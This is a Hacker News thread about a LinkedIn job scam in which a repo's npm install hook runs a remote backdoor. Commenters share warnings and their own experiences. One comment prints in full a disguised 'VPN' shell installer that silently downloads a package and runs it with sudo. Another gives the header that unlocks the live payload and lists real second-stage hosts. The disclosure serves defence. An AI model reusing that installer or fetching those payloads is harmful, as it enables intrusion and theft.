9 ms·
A backdoor in a LinkedIn job offer
- ChrisMarshallNY 4mo ago> So far nothing has changed and the code is still up. That sucks, but it seems to be par for the course, these days.
- theoeiffijr 4mo agoMaybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast. Remember to use protection when meeting random people, and putting their junk deep inside your computer!
- rvz 4mo agoOr running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice. The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
- firefax 4mo ago>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast. It's ok, the guy with glasses from the Daily Show said it's ok.
- mschuster91 4mo ago> Maybe Mac will finally get decent virtualization framework. it already has, you can configure intellij to run npm commands in a Docker container.
- CyanLite2 4mo agoIsn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
- lysace 4mo agoHoisted by their own petard vibes.
- rektomatic 4mo agoI really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
- gman2093 4mo agoArbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
- imankulov 4mo agoYou can actually test it yourself. The actual URL is in the post and the website is still up.
- mfkp 4mo agoSeems like it actually loads a PNG image now, maybe the npm script adds some additional headers to trigger the payload.
- flexagoon 4mo agoAFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
- TurdF3rguson 4mo agoThis has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
- phyzome 4mo agoCompromise of developer's access, API keys, etc. in order to create a supply chain attack.
- robotnikman 4mo agoWith how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity. Stay vigilant out there everyone.
- DFHippie 4mo ago> Such people are the worst of the worst of humanity. I don't know. There's a plentiful supply of bad humans.
- robotnikman 4mo agoAnyone who preys on people who are desperate and hurting are certainly some of the worst though.
- jmward01 4mo agoSo, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
- calvinmorrison 4mo agoyes this is a crime.
- mrhottakes 4mo agoUnfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
- jmward01 4mo agoI see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
- noisy_boy 4mo agoWon't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device. I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
- 4mo ago
- CalChris 4mo agoIt’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
- clemailacct1 4mo agoThis is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
- srikanth86 4mo agoI was a victim of this attack on Friday. The interviewer had a russian / east European accent.
- clemailacct1 4mo agoThey use mules all the time
- contingencies 4mo agoThought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
- blharr 4mo agoOr, you know... money
- dyingkneepad 4mo agoAh, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
- wxw 4mo ago> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.” > ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine. > npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor. > The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install. Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
- cyanydeez 4mo agosurprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
- bee_rider 4mo agoLinkedIn is unusually resistant to enshitification; it started that way.
- gleenn 4mo agoFriends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop. Edit: typos
- mattcasmith 4mo agoI’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on. The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
- atum47 4mo agoI've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
- annzabelle 4mo agoMy brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer. People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
- NoMoreNicksLeft 4mo agoA long time ago, I worked for an ISP that sent out the famous "we'll never ask for your passwords" email. Then, about 3 weeks in, they sent out emails asking people for their passwords. If you told me that this was a happy ending, he sent in a check and they sent a laptop and after 2 paychecks released his deposit, I wouldn't be shocked. Some companies are run by idiots. I even know that most companies could probably cover scammed hardware with business insurance, but then I wonder how many flying-by-the-seat-of-their-pants outfits don't have the insurance. Hoping he wasn't scammed.
- 1dontnkow_ 4mo agoIt seems it was one of those cases where the "InfoSec" Department kept doing all these trainings how we don't do that and why but some manager or head decided to sent that email and surely cant face repercussions due to influence. In the end it fucks me because when I tell my dad "Oh they never ask for you password, so don't say it to nobody no matter what." He "But when they asked us last year?!"
- paradox460 4mo ago
- yieldcrv 4mo agonow imagine if you were like the rest of us and didn’t write a blog post about it
- MAustriaGA 4mo ago[dead]
- yieldcrv 4mo agoBeen going on for over half a decade I think we need a different kind of PSA if its still so new to people
- avgDev 4mo agoMore reasons for me to dislike linked-in. I have an account. I hate it.
- l0new0lf-G 4mo agoYet another reason to be reluctant to even discuss linkedin job offers
- Yhippa 4mo ago> but on a more tired or rushed day This has nearly gotten me before, and I got lucky.
- Raed667 4mo agoThey seem to using the same domain for multiple targets: reddit thread from 3 months ago: https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_tried_to_social_engineer_me_via_linkedin/ https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
- BobAliceInATree 4mo ago> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up. Oh, Microsoft.
- INTPenis 4mo agoThey should have reported it for DMCA violation. It would be gone instantly.
- andy99 4mo agoI once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
- Waterluvian 4mo agoI’ve seen this fake Carney garbage on YouTube. Money speaks louder than truth.
- mDyJzDPmBdG 4mo ago> they investigated and didn’t find any violation of their policies. When my YT Premium elapsed 70% od ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were strait up foreign state-level propaganda, those I didn't even bother to report.
- 0xpgm 4mo agoWeird, isn't it? Microsoft owns all of LinkedIn, Github and NPM. All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
- paradox460 4mo ago
- dolebirchwood 4mo agoAs part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already). They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed): ``` ( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ] ``` Yeah, no. Be careful out there. By the way, here's the scammer's "company website": https://jtwllc.com/ https://jtwllc.com/ Superficially looks legit until you start investigating the finer details.
- srikanth86 4mo agoOh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
- zuzululu 4mo agoI'm working 3 remote jobs right now and I can tell you guys to really watch out. Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear. They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it. I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules: - Don't stay loyal to your employers. - Don't stay honest to those don't value it. - Don't stay complacent always innovate.
- worik 4mo ago> Don't stay honest to those don't value it. IMO you are either honest or you are not
- binsquare 4mo agoWould highly recommend running any repo in an isolated environment like a vm
- f055 4mo agoI used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
- khernandezrt 4mo agoIt would have been game over for me.
- stainablesteel 4mo agothe entire internet is just phishing at this point
- aykutseker 4mo agoThis is uncomfortably close to a normal interview task now. Someone sends you a repo, says the install is broken, and asks you to take a look. A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
- suyavuz 4mo agoThe interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
- munificent 4mo agoAt least now there is a blog post that you can link to and say "Sorry, but I don't run npm install locally because of the risk of phishing attacks."
- bitfilped 4mo agoA skilled employee would never skip that step, why should you do so in an interview context? Skipping that step seems like a task failure to me just as much as any other part of the question from an interviewer perspective. Maybe I shouldn't hire the guy that blindly runs code just because someone "senior" to them asks.
- joebuckwilliams 4mo agoSeen similar: https://www.theregister.com/security/2026/04/23/dev-targeted-by-sophisticated-job-scam/5226263 https://www.theregister.com/security/2026/04/23/dev-targeted...
- deleted 4mo ago[deleted]
- hajdjqkekrqow 4mo agoSomething similar happened to a friend, repo https://github.com/momonity/cryptoskope/ https://github.com/momonity/cryptoskope/
- LooseMarmoset 4mo agoWere I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown. The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
- elwebmaster 4mo agoWhy is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
- PufPufPuf 4mo agoNothing to do with nom itself. This sort of scam would have worked with many different technologies, even a Makefile.
- Joel_Mckay 4mo agoCat related technology like noms and toe beans are immune to this exploit. =3
- mock-possum 4mo agoBecause uh every OS on earth has the exact same vulnerabilities? How are you supposed to stop a user from downloading something random from the internet and running it?
- Joel_Mckay 4mo agoSome posix like systems mount /home with noexec in fstab. Practically, most systems leave it off because many out-of-band user space script language package ecosystems stop working. =3 There are also adaptive application firewalls that are user friendly. https://github.com/evilsocket/opensnitch https://github.com/evilsocket/opensnitch
- IshKebab 4mo agonoexec clearly isn't going to help if you run untrusted JavaScript...
- Joel_Mckay 4mo agoSometimes, but nodejs or npm won't work properly without the headless chromium VM, and would need bypassing local file-access security-sandbox restrictions most normal system Web-browsers enforce by default. If root installs OS supported VM packages, than it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
- h4kunamata 4mo agoHonestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
- alexandra_au 4mo agoI feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
- rektlessness 4mo agoIt’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck. Yes, throwaway VPS for interview coding tasks should be the new norm.
- xvxvx 4mo agoI only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
- blindriver 4mo agoLinkedIn is a cesspool of scams now. They know there's a high degree of fraud and they don't do anything about it. They don't care. I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
- jimt1234 4mo agoIt's become Facebook, too. I constantly see posts about the MAGA issue of the day.
- nubinetwork 4mo ago> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up. Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
- denysvitali 4mo agoI had a similar experience, just by email. https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-a-sophisticated-developer-malware-campaign/ https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-... It was likely DPKR.
- dantodor 4mo agoBeen through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bell start ringing when they insist you to run locally their sh*t
- blablabla123 4mo agoSimilar for me. One was for an overly very well paid position. I always run (p)npm audit before running npm repos, so lots of issues were found. I tried to fix them but I would have gone over the time limit. So I asked the recruiter about it and if it makes sense to run it in an isolated VM. No answer... The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
- vidarh 4mo agoThe big red flag should be giving github access before signing any contracts.
- friendly_chap 4mo agoThey mostly use public repositories though.
- vidarh 4mo agoYeah, but that should also be a red flag.
- 1dontnkow_ 4mo agoYeah at least when you interview locally in your areas, you get to meet them before you get a random test assignment. But also online, once or twice I received these Leetcode style sites to register and do a few tests before we meet, which was weird for me and I just ignored it. One of them later asked "Why I didn't have time to do it yet" and I told them I first meet people and check the fit before I do tests, like who the hell does that differently? Hope it hasn't become a way more common thing.
- dataviz1000 4mo agoI don't have a LinkedIn profile. ~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application. In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
- platevoltage 4mo agoI have a profile, but you couldn't pay me to look at the feed.
- saaspirant 4mo agoI use a Firefox extension to block the feed
- ekianjo 4mo agoWait until the extension gets acquired by a third party and turns into malware
- xboxnolifes 4mo agoWhat part of applying to LinkedIn jobs require you looking at the feed?
- gyoridavid 4mo agoI wonder if an antivirus software would catch this..
- NordStreamYacht 4mo ago"Recruiters" are getting sophisticated. I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices." Turns out they were just fishing for inside information on my employer's end customer's applications.
- ncr100 4mo agoThe US government should be involved in protecting the US fromthis kind of international crime and corporate espionage. Just a thought, but no call to action from me.
- deleted 3mo ago[deleted]
- abhisek 4mo agoSmells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
- bitfilped 4mo agoOnce again I'll state my opinion, don't use linkedin. It's a social media site not an employment/recruitment resource.
- jhancock 4mo agoThis type of attack has been happening a lot the past 2 years. I've seen one that was very well done...the GitHub account of a fairly well known security researcher had been compromised...their identity and code was being used as part of the recruitement. I reached out to the person...who was understandably embarrassed and told me they had reported this to LinkedIn + Github but saw no action. This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit be this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
- dd8601fn 4mo agoCall it a conspiracy theory, but I think a lot of these businesses actively avoid making serious efforts because even trying creates expectations. Ones that they don’t want to be on the hook for. Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content. It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
- mujib77 4mo agoThis is the first time i have heard of this type of scam so horrible like people need to be careful on both github and linkedin
- lkjdsklf 4mo agoThey’re quickly becoming the new sourceforge
- psychoslave 4mo agoI'm a simple man. I see crypto currency and I move away from what looks likely a social scam. Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.
- zombot 4mo ago> so just installing dependencies executes the backdoor. How anybody in their right mind still uses this tech stack is beyond me. > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up. Remember to treat every size on the internet as an adversary, even if they weren't in the past.
- sambhu 4mo agoI had a [similar](https://dev.shivagaire.com.np/linkedin-client-rce-backdoor-npm-install https://dev.shivagaire.com.np/linkedin-client-rce-backdoor-n...) encounter before. Jobs are scarce and this kind of targeted dev attacks semms to be more frequent these days.
- qq66 4mo agoWestern governments should treat large-scale scammers and the countries that protect them as an act of war.
- matltc 4mo agoThe difference between pre- and post-chatbot writeups is stark: https://igor-blue.github.io/2021/03/24/apt1.html https://igor-blue.github.io/2021/03/24/apt1.html $100 says OP is Claude
- doubleorseven 4mo agonice! i fell for it..
- suttontom 4mo agoI don't want to be cynical, but maybe spending hours every day using Claude has made some of us particularly attuned to picking this up. For some reason as soon as I read "The trap was in app/test/index.js," I instantly knew it was Claude. It's too bad, because there will obviously be some false positives, but it makes me immediately disregard the author.
- OtherShrezzing 4mo agoI sometimes use the Claude app with text to speech enabled. It’s got a quite distinctive voice/tempo combo when it’s outputting speech. Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
- huflungdung 4mo ago[dead]
- deleted 4mo ago[deleted]
- ruperthair 4mo agoI think that comment is a little unfair, as the one you link to is a much more sophisticated attack. Thanks for the link, though. Great read!
- croes 4mo agoSo the backdoor isn’t in the offer but came per offer
- fatih-erikli-cg 4mo ago[dead]
- deleted 4mo ago[deleted]
- atraac 4mo agoI work in crypto and this is happening practically every other day. I refuse anyone on LinkedIn that I don't know personally and has web3 or crypto anywhere in the description. It's all fake accounts with fake job offers. It's a pretty known scam.
- redbell 4mo ago> I’ve heard of these attacks and read about them on HN And, I am reading this on HN right now. What a coincidence! I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've came across this pattern. Eye opening indeed.
- deleted 4mo ago[deleted]
- hboon 4mo agoI didn't read everything, but I had a DM offering a gig a few weeks ago, and asked me to check out a React site/app. I cloned it and it looked dubious; replied I pass.
- swithek 4mo agoI'm seeing the same. Worth flagging that maintainers seem to be a specific target now, not just job seekers. If you've got commit access to anything popular, backdoors like this become a lot more dangerous, because the supply-chain payoff is much bigger than your laptop
- harrouet 4mo agoDamned, there is a market for an "antivirus for developers".
- saos 4mo ago> but on a more tired or rushed day, I could easily have run npm install before thinking it through
- harrouet 4mo agoHow about running that backdoor from a honeypot and check what it is trying to do?
- teiji-tango 4mo ago[flagged]
- deleted 4mo ago[deleted]
- lamtanphan 4mo agoI reported it and it seems like the repo no longer exists
- ionwake 4mo agoIm not sure if anyone will read this, but I consider myself pretty savvy having been on the internet over decades however I nearly succumbed to a highly complex Linkedin "Interview with video call just to get me to install malware". It was the most bizarely long roundabout way to get me to isntall malware I had ever witnessed I couldnt fathom it was real, I mean they interviewed me for half an hour. Now you might think Im paranoid however it was obvious, their camera was off ( personal preference they said) and well I allowed it... only for other eventual straws to breal the camels back, and I realised "oh uh oh this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction". I was flumoxed tbh I couldnt believe it, as the approach had been very organic, through Linkedin Dms, just that eventaully I realised I had succumbed to "yes men" ( the only thing that would get passed my already strict job filters ironically) to allow myself into such a comprimising situation. The only question I had is how did they do such a smooth complex manouver and then I realised... oh they just used AI to come up with the plan and implementation.
- vidarh 4mo agoYeah, the camera off thing has happened to me too, and it should be a red flag to anyone if an interview situation.
- throwawayffffas 4mo agoHm, the url returns a png. Did he obscure the actual url? Couldn't get it to send me json or js... Update: found a clone of the repo on github and got the payload, all you have to do is add a header `bearrtoken: logo` It's obfuscated, I will feed it to qwen to see what can be gleaned.
- berkes 4mo agoSame here. I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png. I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
- throwawayffffas 4mo agoGot it after adding the header: `bearrtoken: logo`. Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.
- throwawayffffas 4mo agoSo fed it to qwen. It seems to think it just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
- jimijazz 4mo agothanks for following down the rabbit hole, let us know what you find! also... why qwen?
- throwawayffffas 4mo ago> why qwen I have it running locally, and i don't want to add credentials to the vm with the malware. According to qwen: It's cross platform It has a bunch of persistence mechanisms. It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev, Verified I got the secondary payload This pack looks like a python 3.10 environment along with an executable called cupsd. And downloads another js script from http://138.201.125.58:1224/client/99/77 http://138.201.125.58:1224/client/99/77 That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
- vidarh 4mo agoThis is a common one. I've had at least half a dozen of them. If I'm bored, I play along, and then play difficult and dumb and see how long it takes until they give up. Some of these will happily get on "interview" calls etc. For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
- taintlord22 4mo ago[dead]
- martinwoodward 4mo agoMartin from GitHub here - the offending repos have been taken down, but the article from Roman is still very much worth reading to understand the attack vector attempted.
- raesene9 4mo agoWorth noting that, this isn't just a risk with npm or other package managers. If you're using LLM agents in the directory of a cloned repo, there's risks in skills, hooks etc automatically executing..
- n3mo-dev 4mo agoLinkedIn offers are mostly eiter scam or just for promotions
- punkbit 4mo agoJob candidates keep facing a lot of hurdles, including scams, Trojan horses like the one presented here, ghosting, wasting candidates' time, nepotism, etc. As a candidate you can easily spend more than 8 hours a day looking for opportunities, switching stacks, studying, doing take-home projects, etc, for absolutely nothing. Life is precious and shouldn't be burned like that!
- ahmd-sh 4mo ago> Life is precious and shouldn't be burned like that Very true. I remember when I was job hunting fot 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent). It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
- kjkjadksj 4mo agoIt is absolutely the worst. Also the feeling that this task of job searching is supremely important. You feel guilty doing anything that isn’t job searching. Meeting friends? Spending money while you aren’t making any? Seems irresponsible internally. When your day fills with stuff that isn’t job searching it makes you feel that day was a failure. Even when you do job search and you have say a month without any bites, it also makes you feel that month was a failure. You feel like you are wasting your life. At least when you had a job, that time spent counted for a little more experience. Every second without a job feels like it counts against you. You feel like a leper. Look at me who failed to secure a job, I must be a failure, you think internally.
- jghn 4mo agoI can not imagine a situation where some random person messages me on linkedin asking me to solve a coding challenge, and I do anything other than block them.
- valar_m 4mo agoI'm guessing you've never experienced the enormous pressure of needing to find a job to buy food and clothes for your family. That's good, I'm glad that you don't know that feeling. But if you did, you'd know how easy it could be for a person to start feeling more and more desperate for any kind of lifeline.
- jghn 4mo agoThere is still no chance that my first reaction to a random stranger asking me to do work for them is "sure", without building some sort of connection. Granted, that means I could still get phished via a coding exercise, but it would require a bit more effort on the attacker's part.
- Kuyawa 4mo agoI've got more than a handful of these offers so I decided to never install anything and politely decline such offers. Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.
- nticompass 4mo ago> recruiter at a small crypto startup That's your first red flag right there.
- maxaw 4mo agothis happened to me too. few things about the process made me suspicious. i downloaded the repo and told claude to "find the malware". took about 15 seconds. remote code execution that would have run upon npm install, iirc. many layers of obfuscation. in implementation, a little different to the op's situation but there are similarities. it was a "crypto startup". maybe they think people in crypto world are more forgiving of idiosyncrasies in the recruiting process? i reported the recruiter's profile to linkedin, with extensive details. they said they wouldn't look into it unless i opened a ticket in some other part of their site, lol. however it seems they got onto it, or someone else complained, because i can't find the recruiter "alice kenny" anymore. but the "company" she was recruiting for is still live: https://www.linkedin.com/company/blockchainaustraliasolutions/ https://www.linkedin.com/company/blockchainaustraliasolution...
- fckgw 4mo agoThey target people looking at crypto startups because they're after wallets and seed phrases
- game_the0ry 4mo ago> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled... Good man, knows what he is doing. FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. Its very fun workflow for experimentation. Still trying to work the kinks to make it easier. > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up. Come on, github...
- zackchen 4mo agoI've pretty much have had the same thing to me happen on Fiverr about 10 months ago. I even did a write up. It was one of the first reverse engineerings I've did. https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba097b https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba0...
- konovalov-nk 4mo agoI wonder if I should submit this to HN: https://www.linkedin.com/pulse/your-data-being-stolen-right-now-nikolay-konovalov-h5o0f/ https://www.linkedin.com/pulse/your-data-being-stolen-right-... Because there's a massive bot network operating on LinkedIn right now... and I'm tired of interacting with it every day.
- lebed2045 4mo agoRevenge! A friend of mine was scammed this way two years ago. So when I finally received a similar offer on LinkedIn, I made them pay to me, twice XD They sent me a GitHub repository and claimed they needed help deploying a token or something similar. The obvious goal was to get me to run their code while connected to a wallet with real funds. I told them: sure, I can probably help, but my time costs money. So I convinced them to pay me for a consultation. For half an hour, I explained how “amazing and simple” the process was, and how they could do it themselves. They claimed to be from the US, but on the call they had an extremely heavy Asian accent. I even recorded part of it on camera, because the whole situation was ridiculous. Before they could get too furious, I told them I did not have more time and that they would need to book another call. So they paid me a second time. Before the second call, i got myself absolutely new macbook was for fun testing it, basically a fresh Mac (i should have been using vm because it’s faster to restore but that time i wasn’t familiar with UTM and i got parallels which is scam itself), just to see how their scam worked. The scam was classic npm install-style: get someone to run scripts from a Git repo and hope they are unaware of how much access that can give to their machine. Honestly, two years ago, I also did not fully understand that simple ‘nom install’ could give attackers such deep access to your computer.
- kwar13 4mo agothey're becoming increasingly common. this is mine from last year https://kaveh.page/blog/job-interview-scam https://kaveh.page/blog/job-interview-scam i've had maybe 10-20 requests after that that i've just blanked ignored.
- greenoracle9 4mo ago[dead]
- amai 4mo agoIsn't that the old trick: download this “suspicios.zip,” unzip it, and click on “backdoor.exe”? Except that in this case, the backdoor code wasn't hidden in the binary - it was open-source, which is why an AI was able to detect it. PS I think "smello" is really not a good name for a startup.
- Avrio15272 3mo ago[dead]